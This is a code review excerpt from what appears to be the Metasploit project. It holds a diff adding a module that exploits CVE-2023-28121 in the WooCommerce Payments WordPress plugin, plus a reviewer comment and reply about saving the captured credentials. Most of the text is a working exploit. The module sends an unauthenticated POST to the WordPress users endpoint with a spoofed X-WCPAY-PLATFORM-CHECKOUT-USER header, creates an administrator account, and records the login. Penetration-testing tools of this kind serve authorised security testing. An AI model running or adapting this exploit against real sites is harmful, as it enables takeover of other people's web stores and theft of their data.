modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb

```diff
@@ -0,0 +1,116 @@
+          [ 'URL', 'https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know/'],
+          [ 'CVE', '2023-28121']
+        ],
+        'DisclosureDate' => '2023-03-22',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [ true, 'User to create', '']),
+        OptString.new('PASSWORD', [ false, 'Password to create, random if blank', '']),
+        OptString.new('EMAIL', [ false, 'Email to create, random if blank', '']),
+        OptInt.new('ADMINID', [ false, 'ID Number of an administrative user', 1]),
+        OptString.new('TARGETURI', [ true, 'The URI of the Wordpress instance', '/'])
+      ]
+    )
+  end
+
+  def check
+    unless wordpress_and_online?
+      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
+    end
+
+    checkcode = check_plugin_version_from_readme('woocommerce-payments', '5.6.2')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      return Msf::Exploit::CheckCode::Safe('WooCommerce-Payments version not vulnerable')
+    end
+
+    checkcode
+  end
+
+  def run
+    if datastore['PASSWORD'].blank?
+      password = Rex::Text.rand_text_alphanumeric(10..15)
+    else
+      password = datastore['PASSWORD']
+    end
+    if datastore['EMAIL'].blank?
+      email = Rex::Text.rand_mail_address
+    else
+      email = datastore['EMAIL']
+    end
+    print_status("Attempting to create administrator -> #{datastore['USERNAME']}:#{password} (#{email})")
+    [nil, 'index.php'].each do |url_root| # try through both '' and 'index.php' since API can be in 2 diff places based on install/rewrites
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, url_root, 'wp-json', 'wp', 'v2', 'users'),
+        'headers' => { "X-WCPAY-PLATFORM-CHECKOUT-USER": datastore['ADMINID'] },
+        'method' => 'POST',
+        'ctype' => 'application/json',
+        'data' => {
+          'username' => datastore['USERNAME'],
+          'email' => email,
+          'password' => password,
+          'roles' => ['administrator']
+        }.to_json
+      })
+      fail_with(Failure::Unreachable, 'Connection failed') unless res
+      next if res.code == 404
+
+      if res.code == 201
+        print_good('User was created successfully')
+        if framework.db.active
+          create_credential_and_login({
+            address: rhost,
+            port: rport,
+            protocol: 'tcp',
+            workspace_id: myworkspace_id,
+            origin_type: :service,
+            service_name: 'Wordpress',
+            private_type: :password,
+            module_fullname: fullname,
+            access_level: 'administrator',
+            status: Metasploit::Model::Login::Status::SUCCESSFUL
```

Comment:
Where is the `private_data` field here for the password? Where is the `username` field for the username? Doesn't seem like your actually reporting the username or password in your call to `create_credential_and_login` here, so from what I'm seeing I don't think your actually saving the login information to the database.

Reply:
Fixed this with https://github.com/rapid7/metasploit-framework/pull/18164/commits/81cf6c2a09b6f323f811ca448842ea809f601d62 which includes several fields that were found to be missing in order to successfully store the credential without Metasploit stack tracing on errors.